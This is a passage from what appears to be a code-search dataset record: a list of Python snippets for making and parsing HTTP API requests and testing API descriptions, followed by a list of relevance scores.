False\n\t\ttry:\n\t\t\t# download data from api\n\t\t\tresult = urllib.request.urlopen(baseurl).read()\n\t\t\treturn result\n\t\texcept urllib.error.URLError:\n\t\t\t# wait 10 minutes if server is not responding and make another call\n\t\t\tprint(\"Seems like server is not responding. 
Will try again in 10 minutes...\")\n\t\t\ttime.sleep(660)", "def home():\n return(\n f\"Available Routes: <br/>\"\n\n f\"For Precipitation: /api/v1.0/precipitation<br/>\"\n f\"Returns Jsonify dictionary of dates and Precepitation<br/><br/>\"\n\n f\"For list of Stations: /api/v1.0/stations<br/>\"\n f\"Returns Jasonify list of stations <br/><br/>\"\n\n f\"For last year temperatures: /api/v1.0/tobs<br/>\"\n f\"Returns Jsonify dictionary of Temperature Observations for last year<br/><br/>\"\n\n f\"Temperature result from the date in format (yyyy-mm-dd): /api/v1.0/yyyy-mm-dd<br/>\"\n f\"Returns an Average, Max, and Min temperatures from given start date of dataset<br/><br/>\"\n\n f\"Temperature result from start date to end date in format (yyyy-mm-dd): /api/v1.0/yyyy-mm-dd/yyyy-mm-dd<br/>\"\n f\"Returns an Average, Max, and Min temperatures for a given date range\"\n\n )", "def _http_get(self, url, params={}):\n if not self.token:\n self.get_token()\n headers = {'Authorization': self.token, 'Accept': 'application/json; indent=4'}\n url = self.server + '/api2' + url\n try:\n r = requests.get(url=url, headers=headers, params=params)\n except requests.exceptions.RequestException as e:\n return check_failed(e)\n # raise ClientHttpError(None, e)\n if r.status_code != 200:\n return check_failed(r.status_code)\n # return ClientHttpError(r.status_code, json.loads(r.text)['error_msg'])\n try:\n data = json.loads(r.text)\n except:\n data = r.text\n # TODO: check data\n return data", "def base_request(url_path):\n response = requests.get(settings.URL_API + url_path)\n if response.status_code != 200:\n return response\n else:\n return response.json()", "def _process_url(self, url):\n response = requests.get(url, timeout=self.TIMEOUT)\n try:\n ret = response.json()\n except JSONDecodeError:\n self.log.exception(\"JSONDecodeError, response: %r, response.text: %r\", response, response.text)\n ret = {\"error\": \"The api broke.\"}\n return ret", "def __init__(self, request: object) -> None:\n super().__init__({}, request, URL, Api)", "def test_get_parameter_processing(self):\n self._register_uri(httpretty.GET)\n photo = trovebox.objects.photo.Photo(None, {\"id\": \"photo_id\"})\n album = trovebox.objects.album.Album(None, {\"id\": \"album_id\"})\n tag = trovebox.objects.tag.Tag(None, {\"id\": \"tag_id\"})\n self.client.get(self.test_endpoint,\n photo=photo, album=album, tag=tag,\n list_=[photo, album, tag],\n list2=[\"1\", False, 3],\n unicode_list=[\"1\", \"2\", \"\\xfcmlaut\"],\n boolean=True,\n unicode_=\"\\xfcmlaut\")\n params = self._last_request().querystring\n self.assertEqual(params[\"photo\"], [\"photo_id\"])\n self.assertEqual(params[\"album\"], [\"album_id\"])\n self.assertEqual(params[\"tag\"], [\"tag_id\"])\n self.assertEqual(params[\"list_\"], [\"photo_id,album_id,tag_id\"])\n self.assertEqual(params[\"list2\"], [\"1,0,3\"])\n self.assertIn(params[\"unicode_list\"], [[\"1,2,\\xc3\\xbcmlaut\"], [\"1,2,\\xfcmlaut\"]])\n self.assertEqual(params[\"boolean\"], [\"1\"])\n self.assertIn(params[\"unicode_\"], [[\"\\xc3\\xbcmlaut\"], [\"\\xfcmlaut\"]])", "def test_simple4(self):\n api = self.load_api_description('simple4.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 2)\n\n resource = api.resources[1]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 2)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = 
operation.output\n self.assertEqual(output.status, 200)\n self.assertEqual(output.type.type.get_reference_name(), 'list(Order)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n operation = resource.operations[1]\n self.assertEqual(operation.method, 'POST')\n input = operation.input\n self.assertEqual(input.type.type.get_reference_name(), 'OrderRequest')\n self.assertEqual(input.contentType[0], 'json')\n output = operation.output\n self.assertEqual(output.status, 201)\n self.assertEqual(output.type.type.get_reference_name(), 'Order')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n self.assertEqual(len(output.headers), 1)\n header = output.headers[0]\n self.assertEqual(header.name, 'Location')\n self.assertEqual(header.type.type.get_reference_name(), 'href')\n self.assertEqual(header.type.ref, 'Order')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')\n\n self.assertEqual(len(api.data_types), 2)\n self.assertEqual(len(api.data_types[0].fields), 5)\n self.assertEqual(len(api.data_types[1].fields), 2)\n self.assertFalse(api.data_types[1].fields[0].optional)\n self.assertTrue(api.data_types[1].fields[1].optional)\n\n resource = api.resources[0]\n self.assertEqual(len(resource.input_bindings), 1)\n self.assertEqual(resource.input_bindings[0].id, 'orderIdBinding')\n self.assertEqual(len(resource.operations), 2)\n self.assertEqual(resource.operations[0].input.params[0].binding, 'orderIdBinding')\n self.assertEqual(resource.operations[1].input.params[0].binding, 'orderIdBinding')", "def rest(method, endpoint, access_token, data={}, id=None):\n headers = {\n 'Authorization': f\"Bearer {access_token}\",\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n base_url = \"https://api.intercom.io/\"\n\n # for creating and updating a companies api using POST method only\n if endpoint in ['contacts', 'companies', 'events', 'tags'] and method == 'POST':\n url = f\"{base_url}{endpoint}\"\n elif endpoint == 'add_tags' and method == \"POST\":\n url = f\"{base_url}contacts/{id}/tags\"\n elif (endpoint == 'contacts') and method == 'POST':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'contact_email' and method == 'POST':\n url = f\"{base_url}contacts/search\"\n elif endpoint == 'notes' and method == 'POST':\n url = f\"{base_url}contacts/{id}/notes\"\n elif endpoint == 'contacts' and method == 'PUT':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'tags' and method == 'DELETE':\n url = f\"{base_url}contacts/{id[0]}/tags/{id[1]}\"\n elif endpoint == 'contacts' and method == 'GET':\n url = f\"{base_url}{endpoint}/{id}\"\n elif endpoint == 'companies' and method == 'GET':\n url = f\"{base_url}{endpoint}?company_id={id}\"\n elif endpoint == 'admin' and method == 'GET':\n url = f'{base_url}admins'\n\n response = requests.request(\n method, url, headers=headers, data=json.dumps(data))\n return response", "def test_simple2(self):\n api = self.load_api_description('simple2.json')\n self.assertEqual(api.name, 'Starbucks')\n self.assertEqual(len(api.resources), 1)\n\n resource = api.resources[0]\n self.assertEqual(resource.name, 'AllOrders')\n self.assertEqual(resource.path, '/')\n self.assertEqual(len(resource.operations), 2)\n\n operation = resource.operations[0]\n self.assertEqual(operation.method, 'GET')\n self.assertIsNone(operation.input)\n output = operation.output\n self.assertEqual(output.status, 200)\n 
self.assertEqual(output.type.type.get_reference_name(), 'list(Order)')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n operation = resource.operations[1]\n self.assertEqual(operation.method, 'POST')\n input = operation.input\n self.assertEqual(input.type.type.get_reference_name(), 'OrderRequest')\n self.assertEqual(input.contentType[0], 'json')\n output = operation.output\n self.assertEqual(output.status, 201)\n self.assertEqual(output.type.type.get_reference_name(), 'Order')\n self.assertEqual(len(output.contentType), 1)\n self.assertEqual(output.contentType[0], 'json')\n\n self.assertEqual(len(api.base), 1)\n self.assertEqual(api.base[0], 'http://test.com/starbucks')\n\n self.assertEqual(len(api.data_types), 2)\n self.assertEqual(len(api.data_types[0].fields), 5)\n self.assertEqual(len(api.data_types[1].fields), 2)\n self.assertFalse(api.data_types[1].fields[0].optional)\n self.assertTrue(api.data_types[1].fields[1].optional)", "def __init__( httpconn, method, uri, uriparts, version, headers ):", "def pull(self, url, params=None, data=None, auth=None, method=\"GET\"):\n try:\n __method_name = inspect.currentframe().f_code.co_name\n if method == \"POST\":\n res = self.session.post(\n url=url,\n auth=auth,\n params=params,\n data=data,\n timeout=consts.API_TIMEOUT,\n )\n else:\n res = self.session.get(\n url=url,\n auth=auth,\n params=params,\n data=data,\n timeout=consts.API_TIMEOUT,\n )\n res.raise_for_status()\n if res and res.status_code in [200, 201]:\n self.applogger.debug(\n '{}(method={}) : {} : API call: Response received successfully. url=\"{}\" params=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n params,\n )\n )\n return res.json()\n else:\n self.applogger.error(\n \"{}(method={}) : {} : API call: Unknown status code or empty \"\n 'response: url=\"{}\" status_code=\"{}\" response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n res.status_code,\n res.text,\n )\n )\n raise Exception(\"Received unknown status code or empty response.\")\n except requests.exceptions.HTTPError as ex:\n if res.status_code == 404:\n self.applogger.debug(\n '{}(method={}) : {} : API call: Got {} Status Code : url=\"{}\"'\n ' response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n ex.response.status_code,\n ex.response.text,\n )\n )\n return {}\n else:\n self.applogger.error(\n '{}(method={}) : {} : API call: Unsuccessful response: url=\"{}\" status_code=\"{}\"'\n ' response=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n ex.response.status_code,\n ex.response.text,\n )\n )\n raise Exception(\"HTTP Error Occurred while getting response from api.\")\n except Exception as ex:\n self.applogger.error(\n '{}(method={}) : {} : API call: Unexpected error while API call url=\"{}\" error=\"{}\"'.format(\n consts.LOGS_STARTS_WITH,\n __method_name,\n self.function_name,\n url,\n str(ex),\n )\n )\n raise Exception(\"Error Occurred while getting response from api.\")", "def api(self) -> str:", "def _get(self, endpoint):\n res = self._request(\"get\", endpoint)\n if not res.content:\n return {}\n try:\n res = res.json()\n except ValueError:\n raise ValueError(\"Cannot parse {} as JSON\".format(res))\n if \"error\" in res:\n raise AirthingsError(res[\"error\"])\n return res", "def _request(self, url, **kwargs):\n headers = {'PRIVATE-TOKEN': self.token}\n response = make_request(self.base_url + 
url, headers=headers, **kwargs)\n logging.info('Requested: {0}'.format(url))\n logging.info('Method: {0}'.format(kwargs.get('method', 'GET')))\n logging.info(response.content)\n return json.loads(response.content)", "def customRequestParser(data):\n if data:\n if(len(data) > 30):\n return \"REQUEST EXCEED MAX ALLOWED\"\n\n requestArray = data.split()\n if(len(requestArray[0]) != 4 or not requestArray[0].isdigit()):\n return \"BAD REQUEST 4 DIGIT MISSING\"\n \n return reverseResponse(data)\n else:\n return \"BAD REQUEST\"", "def _api_request(*args, **kwargs):\n response = requests.request(*args, **kwargs)\n return APIResponse(response)", "def json_api_call(url):\n response = requests.get(url)\n return response.json()", "def _request(self, endpoint: str = \"/api/\", params: object = {}) -> dict:\n ret: dict = {}\n try:\n if not self.api_key:\n ret[\"error\"] = \"API key is empty\"\n raise APIError(ret['error'])\n\n r = requests.get(f\"{self.apibase}{endpoint}\",\n params=params,\n headers=self.headers,\n verify=self.verify_ssl)\n response_data = orjson.loads(r.text)\n except orjson.JSONDecodeError:\n ret[\"error\"] = \"Failed to parse response data to JSON\"\n if self.debug:\n ret[\"error\"] += \"\\nDescription: \" + r.reason\n ret[\"error\"] += \"\\nData: \" + r.text\n except requests.HTTPError:\n ret[\"error\"] = f\"{r.status_code}: {r.reason}\"\n if self.debug:\n ret[\"error\"] += \"\\nDescription: \" + r.reason\n ret[\"error\"] += \"\\nData: \" + r.text\n\n if ret.get('error', None):\n raise APIError(ret['error'])\n check_status_code(request=r, debug=self.debug, ret=ret)\n\n ret = response_data\n return ret", "def _make_request(self, additional_params: dict, new_base_url: str = None) -> list:\n if new_base_url:\n url: str = new_base_url\n params: dict = additional_params\n else:\n url: str = self.base_url\n params: dict = dict(self.base_params, **additional_params)\n response: requests.Response = self.session.get(url, params=params)\n if response.status_code == 200:\n try:\n response_text = json.loads(response.text)\n except ValueError:\n response_text = response.text\n else:\n raise ALHTTPExceptionFromResponse(response)\n\n # sometimes we get a pure dictionary back, let's wrap it in a list for consistency\n if isinstance(response_text, dict):\n response_text = [response_text]\n return response_text", "def api_root(request, format=None):\n return Response(\n {\n 'users': reverse('cloud:user-list', request=request),\n 'configuration': reverse('cloud:configuration-detail', request=request),\n 'statistics': reverse('cloud:statistics-detail', request=request),\n 'state': reverse('cloud:state-detail', request=request)\n }\n )", "def test_trucks_api(self):\n resp = self.app.get('/trucks')\n self.assertEqual(resp.status_code, 200)\n\n # ensure proper JSON is returned\n data = json.loads(resp.data)\n assert 'resp' in data\n for item in data['resp']:\n # address is not actually required\n assert 'name' in item\n assert 'fooditems' in item\n assert 'latitude' in item\n assert 'longitude' in item\n assert 'schedule' in item", "def request(query):", "def _make_request(self, url: str, parameters: dict = None,\n method: str = 'GET', *args, **kwargs):\n response = requests.request(\n method=method,\n url=build_url(\n self.BASE_API_URL, url, parameters\n ),\n headers={\n 'Authorization': 'Bearer {}'.format(self._access_token)\n }, **kwargs\n )\n if response.ok:\n return response.json()\n raise MondoApiException(response.json()['message'])", "def parse_start_url(self, response):\n 
self.parse_obj(response)", "def _getFromBody(self, request):\n assert self.error is None\n assert isinstance(request.body, str)\n try:\n json_rpc_request_dict = loads(request.body)\n if isinstance(json_rpc_request_dict, list):\n self.list = json_rpc_request_dict\n return\n except ValueError, e:\n error(\"failed to parse JSON object in the body\")\n self.error = JsonRpcError.PARSE_ERROR\n return\n for k, v in json_rpc_request_dict.iteritems():\n if k == \"jsonrpc\":\n self.jsonrpc = v\n if k == \"method\":\n self.method = v\n if k == \"id\":\n self.id = v\n if k == \"params\":\n self.params = v\n self.dict[k] = v", "def __parse(self, ch, method, properties, body: bytes):\n input_msg = body.decode()\n request = json.loads(input_msg)\n answer_msg = {}\n err_code = 0\n err_msg = \"\"\n req_id = request.get(\"id\")\n try:\n tag = request[\"tag\"]\n if tag == \"who_are_you\":\n answer_msg = self.whoami()\n elif tag == \"task\":\n answer_msg = self.generate()\n else:\n err_code = -2\n err_msg = \"Unexpected param\"\n except KeyError:\n err_code = -1\n err_msg = \"Error request parsing\"\n finally:\n self.__answer(json.dumps({\"req_id\": req_id,\n \"data\": answer_msg,\n \"err\": {\"code\": err_code,\n \"msg\": err_msg}}))", "def __init__(self):\n self._url = \"\"\n self._verb = VERBS.GET\n self._params = {}\n self._data = {}", "def parse_request(json_data: str) -> Request:\n logger.debug('Type: {}'.format(type(json_data)))\n data = json.loads(json_data)\n\n return Request(\n data[\"text\"],\n PatternCategory(data[\"previous_pattern\"]\n ) if \"previous_pattern\" in data else None,\n data[\"mood\"],\n data[\"affection\"],\n Gender(data[\"bot_gender\"]),\n data[\"bot_name\"],\n date.fromtimestamp(data[\"bot_birthdate\"]),\n data[\"bot_favorite_color\"],\n data[\"father_name\"],\n data[\"father_age\"],\n data[\"mother_name\"],\n data[\"mother_age\"],\n )", "def _get_request_parser(self, operation):\n\n wpsrequest = self\n\n def parse_get_getcapabilities(http_request):\n \"\"\"Parse GET GetCapabilities request\n \"\"\"\n\n acceptedversions = _get_get_param(http_request, 'acceptversions')\n wpsrequest.check_accepted_versions(acceptedversions)\n\n def parse_get_describeprocess(http_request):\n \"\"\"Parse GET DescribeProcess request\n \"\"\"\n version = _get_get_param(http_request, 'version')\n wpsrequest.check_and_set_version(version)\n\n language = _get_get_param(http_request, 'language')\n wpsrequest.check_and_set_language(language)\n\n wpsrequest.identifiers = _get_get_param(\n http_request, 'identifier', aslist=True)\n\n def parse_get_execute(http_request):\n \"\"\"Parse GET Execute request\n \"\"\"\n version = _get_get_param(http_request, 'version')\n wpsrequest.check_and_set_version(version)\n\n language = _get_get_param(http_request, 'language')\n wpsrequest.check_and_set_language(language)\n\n wpsrequest.identifier = _get_get_param(http_request, 'identifier')\n wpsrequest.store_execute = _get_get_param(\n http_request, 'storeExecuteResponse', 'false')\n wpsrequest.status = _get_get_param(http_request, 'status', 'false')\n wpsrequest.lineage = _get_get_param(\n http_request, 'lineage', 'false')\n wpsrequest.inputs = get_data_from_kvp(\n _get_get_param(http_request, 'DataInputs'), 'DataInputs')\n wpsrequest.outputs = {}\n\n # take responseDocument preferably\n resp_outputs = get_data_from_kvp(\n _get_get_param(http_request, 'ResponseDocument'))\n raw_outputs = get_data_from_kvp(\n _get_get_param(http_request, 'RawDataOutput'))\n wpsrequest.raw = False\n if resp_outputs:\n wpsrequest.outputs = 
resp_outputs\n elif raw_outputs:\n wpsrequest.outputs = raw_outputs\n wpsrequest.raw = True\n # executeResponse XML will not be stored and no updating of\n # status\n wpsrequest.store_execute = 'false'\n wpsrequest.status = 'false'\n\n if not operation:\n raise MissingParameterValue('Missing request value', 'request')\n else:\n self.operation = operation.lower()\n\n if self.operation == 'getcapabilities':\n return parse_get_getcapabilities\n elif self.operation == 'describeprocess':\n return parse_get_describeprocess\n elif self.operation == 'execute':\n return parse_get_execute\n else:\n raise OperationNotSupported(\n 'Unknown request %r' % self.operation, operation)", "def parse_response(self, response, case):\n request = response.request\n parsed = {\n 'request': {\n 'method': request.method,\n 'url': request.url,\n 'body': request.body,\n },\n 'response': {\n 'headers': OrderedDict(),\n 'status_code': response.status_code,\n 'reason': response.reason,\n }\n }\n\n # Re-assemble request line\n url_parts = urlparse(request.url)\n parsed['request']['request_line'] = '%s %s%s%s HTTP/1.1' % (\n request.method, url_parts.path, '?' if url_parts.query else '',\n url_parts.query)\n\n # Process request headers\n if self.mode == 'display':\n hostname = url_parts.hostname\n else:\n hostname = self.doc_hostname\n parsed['request']['headers'] = OrderedDict((('Host', hostname),))\n for header in sorted([h.title() for h in request.headers]):\n raw_value = request.headers[header]\n value = self.parse_header(header, raw_value, 'request')\n if value:\n parsed['request']['headers'][header.title()] = value\n\n # Re-assemble response line\n parsed['response']['response_line'] = 'HTTP/1.1 %s %s' % (\n response.status_code, response.reason)\n\n # Process response headers\n for header in sorted([h.title() for h in response.headers]):\n raw_value = response.headers[header]\n value = self.parse_header(header, raw_value, 'response')\n if value:\n fixed_header = header.title().replace('Www', 'WWW')\n parsed['response']['headers'][fixed_header] = value\n\n # Process response body\n response.encoding = 'utf-8'\n body = response.text\n if self.standardize:\n body = body.replace(api, self.doc_base_url)\n for key, value in case.get('standardize', {}).items():\n assert key in ('created', 'modified', 'date')\n pattern = r\"\"\"(?x)(?s) # Be verbose, . include newlines\n \"%s\":\\s\" # Key and quote\n \\d{4}-\\d{2}-\\d{2} # Date\n T\\d{2}:\\d{2}:\\d{2} # Time\n \\.\\d{0,6}Z # Microseconds and UTC timezone\n \", # End quote and comma\n \"\"\" % key\n replace = '\"%s\": \"%s\",' % (key, value)\n body = re.sub(pattern, replace, body)\n parsed['response']['body'] = body\n\n return parsed", "def request(self, methods, params, format='json'):\n params['api_key'] = self.api_key\n params['expire'] = int(time.time()) + 600 # Grant this request 10 minutes.\n params['format'] = format\n if 'sig' in params: del params['sig']\n params['sig'] = self.hash_args(params)\n\n request_url = '/'.join([self.ENDPOINT, str(self.VERSION)] + methods) + '/?' 
+ self.unicode_urlencode(params)\n #print request_url\n request = urllib.urlopen(request_url)\n data = request.read()\n\n return json.loads(data)", "def _do_request(self, url, method='GET', body=None):\n response, content = self.request(url, method=method, body=body, headers=self.headers)\n if int(response['status']) != 200:\n raise GPAPIError(response['status'], 'ERROR IN REQUEST')\n json = simplejson.loads(content)\n return json", "def parse_xmlrpc_request(request):\n if request.content_length > (1 << 23):\n # protect from DOS (> 8MB body)\n raise ValueError('Body too large (%s bytes)' % request.content_length)\n params, method = xmlrpclib.loads(request.body)\n return params, method", "def fill_from_api_response(self, api_response):\n pass", "def get_api_response_data(base_url: str, **kwargs: Any) -> Any:\n query = urlencode(kwargs)\n url = f'{base_url}?{query}'\n\n response = requests.get(url)\n response.raise_for_status()\n\n return response.json()", "def parser(self, q, casing=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/{1}'.format(self.get_url(), 'parser')\r\n\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json" ]
[ "0.6661732", "0.6361013", "0.6351881", "0.63334227", "0.6265376", "0.62463653", "0.61369115", "0.61359483", "0.6097976", "0.6052464", "0.6047303", "0.60433483", "0.59891516", "0.58926797", "0.5875995", "0.5862154", "0.5862154", "0.5862154", "0.5862154", "0.581381", "0.579058", "0.57867575", "0.5781066", "0.5770481", "0.5764894", "0.57387334", "0.5713837", "0.5712028", "0.56802887", "0.56727254", "0.5671666", "0.5667968", "0.5657201", "0.5653606", "0.5648943", "0.56296396", "0.55895144", "0.55869085", "0.55866086", "0.55849415", "0.5584484", "0.55817413", "0.5573634", "0.5557172", "0.554947", "0.5543188", "0.5536592", "0.5529045", "0.5523614", "0.5509856", "0.5508179", "0.5498941", "0.54863876", "0.5481961", "0.54771537", "0.5458355", "0.54507554", "0.5450603", "0.5442747", "0.5429266", "0.542524", "0.54250777", "0.54155344", "0.54145175", "0.5413322", "0.5408159", "0.5405341", "0.54043585", "0.5403654", "0.5392508", "0.538629", "0.5381379", "0.53766054", "0.53724277", "0.5367579", "0.5366489", "0.5363652", "0.53581834", "0.5355706", "0.5355598", "0.5348449", "0.53454864", "0.53435344", "0.53424", "0.5342093", "0.53350824", "0.5333573", "0.53331935", "0.53320706", "0.53278184", "0.5327772", "0.5327164", "0.53257775", "0.53221136", "0.5321435", "0.53199106", "0.53034055", "0.5303177", "0.5300524", "0.5293814", "0.5291379" ]
0.0
-1
Create a logfile that the rest of the script can write to.
def log_start():
    scriptDir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    scriptName = os.path.splitext(os.path.basename(__file__))[0]
    log = logging.getLogger('cam_server')
    hdlr = logging.FileHandler(scriptDir+'/logs/'+scriptName+'.log')
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
    hdlr.setFormatter(formatter)
    log.addHandler(hdlr)
    log.setLevel(logging.INFO)
    return log
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_logfile(self):\r\n if not self.console_redirect:\r\n return None\r\n\r\n # PCU_logs.robot need a timestamp for console logs as can be run several times\r\n if self.name == self.log_test.replace('.robot', ''):\r\n return open('{0}\\{1}_console_log_{2}'.format(\r\n self.output_dir_path, self.name, datetime.now().strftime(\"%m%d%H%M\")), \"w+\")\r\n else:\r\n return open('{0}\\{1}_console_log'.format(self.output_dir_path, self.name), \"w+\")", "def _createLogFile(LogFile,date,LocalPath,ShowTagsResult):\n try:\n LOG = open(LogFile,\"w\")\n if _verbose:\n print(\"Writing Production Host, Location, Release and Tags information in %s\" % LogFile) \n LOG.write(\"These performance tests were executed on host %s and published on %s\" % (HOST,date))\n LOG.write(\"They were run in %s\" % LocalPath)\n LOG.write(\"Results of showtags -r in the local release:\\n%s\" % ShowTagsResult)\n LOG.close()\n except IOError as detail:\n print(\"WARNING: Can't create log file\") \n print(detail)", "def _createlog(self):\n\t\tif self.toemail and self.fromemail and self.smtphost:\n\t\t\t# Use the email logger as the first logger, so that when sending the email (in :meth:`EmailLogger.close`) fails, it will still be logged to the log file/stdout/stderr\n\t\t\tself._loggers.append(EmailLogger(self))\n\t\tif self.log2stderr:\n\t\t\tself._loggers.append(StreamLogger(self, sys.stderr, self._formatlogline))\n\t\tif self.log2stdout:\n\t\t\tself._loggers.append(StreamLogger(self, sys.stdout, self._formatlogline))\n\t\tif self.log2file:\n\t\t\t# Create the log file\n\t\t\tlogfilename = ul4c.Template(self.logfilename, \"logfilename\").renders(job=self)\n\t\t\tlogfilename = url.File(logfilename).abs()\n\t\t\tself.logfileurl = str(url.Ssh(misc.sysinfo.user_name, misc.sysinfo.host_fqdn or misc.sysinfo.host_name, logfilename.local()))\n\t\t\tskipurls = [logfilename]\n\t\t\tlogfile = logfilename.open(mode=\"w\", encoding=self.encoding, errors=self.errors)\n\t\t\tif self.loglinkname is not None:\n\t\t\t\t# Create the log link\n\t\t\t\tloglinkname = ul4c.Template(self.loglinkname, \"loglinkname\").renders(job=self)\n\t\t\t\tloglinkname = url.File(loglinkname).abs()\n\t\t\t\tskipurls.append(loglinkname)\n\t\t\t\tlogfilename = logfilename.relative(loglinkname)\n\t\t\t\ttry:\n\t\t\t\t\tlogfilename.symlink(loglinkname)\n\t\t\t\texcept OSError as exc:\n\t\t\t\t\tif exc.errno == errno.EEXIST:\n\t\t\t\t\t\tloglinkname.remove()\n\t\t\t\t\t\tlogfilename.symlink(loglinkname)\n\t\t\t\t\telse:\n\t\t\t\t\t\traise\n\t\t\tself._loggers.append(URLResourceLogger(self, logfile, skipurls, self._formatlogline))", "def logfile(targetfile=\"ros.log\"):\n log = logging.getLogger(__name__)\n log.basicConfig(filename=str(targetfile))", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def init_log_file(self):\r\n try:\r\n os.makedirs(config[\"server_log_path\"])\r\n except OSError:\r\n if not os.path.isdir(config[\"server_log_path\"]):\r\n raise\r\n server_log_file = logging.FileHandler(\r\n config[\"server_log_path\"] + 'server_log_' + time.strftime('%Y-%m-%d_%H.%M.%S') + '.txt')\r\n server_log_file.setLevel(logging.DEBUG)\r\n server_log_file.setFormatter(file_formatter)\r\n server_log.addHandler(server_log_file)", "def create_logger():\n global logger\n\n formatter = logging.Formatter('%(asctime)s|%(levelname)s|%(message)s')\n handler = TimedRotatingFileHandler(log_file, when=\"midnight\", interval=1)\n 
handler.setFormatter(formatter)\n handler.setLevel(log_level)\n handler.suffix = \"%Y-%m-%d\"\n logger = logging.getLogger(\"sacplus\")\n logger.setLevel(log_level)\n logger.addHandler(handler)", "def make_log():\n log_file = os.path.join(phys_dir,'ge_phys2bids_'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")+'.log')\n with open(log_file,'w') as log:\n log.write('-------- GE phys2bids --------\\n\\n')\n log.write('DICOM directory: %s\\n'%dcm_dir)\n log.write('Physiology directory: %s\\n'%phys_dir)\n log.write('Output directory: %s\\n\\n'%out_dir)\n log.write('%d EPI files were found\\n\\n'%len(dcm_dict))\n for rn in dcm_dict.keys():\n log.write('------------------------------\\n')\n log.write('%s\\n'%dcm_dict[rn]['out_name'])\n log.write('Start time: %s\\n'%dcm_dict[rn]['start_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('End time: %s\\n'%dcm_dict[rn]['end_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('PPG file: %s\\n'%dcm_dict[rn]['ppg_file'])\n log.write('Respiration file: %s\\n'%dcm_dict[rn]['resp_file'])\n log.write('ECG file: %s\\n'%dcm_dict[rn]['ecg_file'])\n log.write('------------------------------\\n\\n')", "def initialize_logger():\n if not os.path.exists(LOGGING_DIRECTORY):\n os.makedirs(LOGGING_DIRECTORY)\n os.chmod(LOGGING_DIRECTORY, 0o777)", "def create_log(self):\n from settings import evidence_path\n test_case = self.__class__.__name__\n log_extension = '.log'\n if evidence_path is not None:\n log_path = '{}/{}{}'.format(\n evidence_path, test_case, log_extension\n )\n else:\n log_path = None\n self.log = Log(log_path)\n self.log = self.log.get_logger()\n return self.log", "def log(msg, logfile):\n print(msg)\n logfile.write(msg + \"\\n\")", "def create_log_file(path):\n with open(path, 'w'):\n pass", "def create_log_file(file_name: str):\n if not log_file_exists(file_name):\n os.mknod(get_complete_file_name(file_name))\n os.chmod(get_complete_file_name(file_name), 0o777)", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logfile():\r\n from core.general.appinit import log_init\r\n log_init(\r\n 'general',\r\n 
'django_api'\r\n )", "def create_log_file(log_dir, filename):\n timestamp = datetime.datetime.now().strftime('%Y%m%d-%H%M%S.%f')\n symlink_name = os.path.join(log_dir, filename)\n timestamped_name = '%s.%s' % (symlink_name, timestamp)\n if os.path.islink(symlink_name):\n os.remove(symlink_name)\n os.symlink(timestamped_name, symlink_name)\n return open(timestamped_name, 'w')", "def init_log():\n os.system('rm -rf /target/testdriver.log || true')\n os.system('touch /target/testdriver.log')\n os.system(f\"chown {uid_gid_output} /target/testdriver.log\")\n os.system('chmod 664 /target/testdriver.log')", "def create_logger():\n logging.basicConfig(level = logging.INFO, filename='logging', filemode='w')\n logger = logging.getLogger(\" \")\n admin_handler = logging.FileHandler('logging')\n admin_handler.setLevel(logging.INFO)\n logger.addHandler(admin_handler)\n logger.warning(f'{admin_handler} created a new logger')\n return logger", "def append_logfile(filename, file_str):\n file_str = \"[\" + get_datetime_str() + \"]\" 